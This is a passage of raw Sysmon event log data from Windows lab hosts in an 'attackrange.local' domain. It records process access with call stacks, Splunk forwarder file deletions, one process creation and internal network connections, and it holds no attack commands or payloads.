08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:53.102{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809129Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:54.801{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D47DB4B0664F990B30C28103CE320F98,SHA256=9E84755E8130DCBCD519F17FC102BE059A54FC6E2AEAF5F8EE11F1ED549B994D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.729{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A401728FE4998CEAC93AC699F99C143,SHA256=5DB7335B9C4EB55D6D1A3CA0EF69A19363417E34345D6D82AB6611D49C53E9E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809128Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:52.728{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57375-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001052329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7BADD8F163132B258AE63E3DF093E46F,SHA256=30EB2C5A9BD37A0AEABADE0414FC451AB869687AFE81B7B1FA5ACD8508DFD7F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D57914224154CE3647C0D7BB38C31B4A,SHA256=FC115FD537208E9A91C731051CDE316EF7ADFB89C8C312089D99E45097F36E77,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.261{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.247{466BC892-F6B6-60EB-AB7D-00000000CF01}7668C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.130{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E3818E6CC0C8E9CE37132EF6E691D66,SHA256=A02E522296847B64361D07A56876EF30ED5B8F46A4EC31F4EC0CC7C8D2AF8B0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:54.030{466BC892-F6B5-60EB-AA7D-00000000CF01}82809932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:55.760{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FFE15FD32ABDC49FB511AF8F57BB9DF,SHA256=3C9FA7903BC37615C8BE50E06C8DA2BC6C12AC20FB43D1F617C8920E4C85CAC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809130Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:55.802{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2206BF8E9719F356F5A946A4D718E44,SHA256=CD802931070014D1723D86C252E04CBD2ABB79F642B986DF08BD0B243C2438A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:55.260{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77BA369E5AD03C17CB47597754D642BA,SHA256=C109DFD5F02395399A0B95C8C987611CD4ABE8BE9D6FB944E82BDEA1EC9DC92C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:56.780{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7904FD51CCF64EB3DC77BF61011B77,SHA256=100A3FECFAADA51B4BB4C2FA22E64DCE5E7F87CDF0FAF614DE0233D597CAAD88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809131Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:56.831{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCC689922F6AC3AB8FC79390C5DD5FF,SHA256=F57231E820DA601389B54D6ACF8F6DCFC8D295B8F80E03D4B54413CE9B022A34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:57.795{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FBA27519663C9EDCF213ECC1F3417CF,SHA256=217FDE936EE3ABE7175A006C9810EF3B5F064677AFFDE5E3CEF37F9B57C542FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809133Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:57.853{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5C7EFB431F5396B9032E3CDFC0B6FF3,SHA256=31F1045B3006725610306000D34EBD8516264ADC8F72AC6D0585879AA0D002B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:57.211{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809132Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:55.340{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57376-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:58.870{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF936B9AEB124B805D7CC624C003E74C,SHA256=55BA3C13AD823489CC11F4E64443FF50B5D742B1E97BCEEC6E1C4143F524574D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.730{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51152-false10.0.1.12-8089- 23542300x80000000000000001052337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:58.825{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 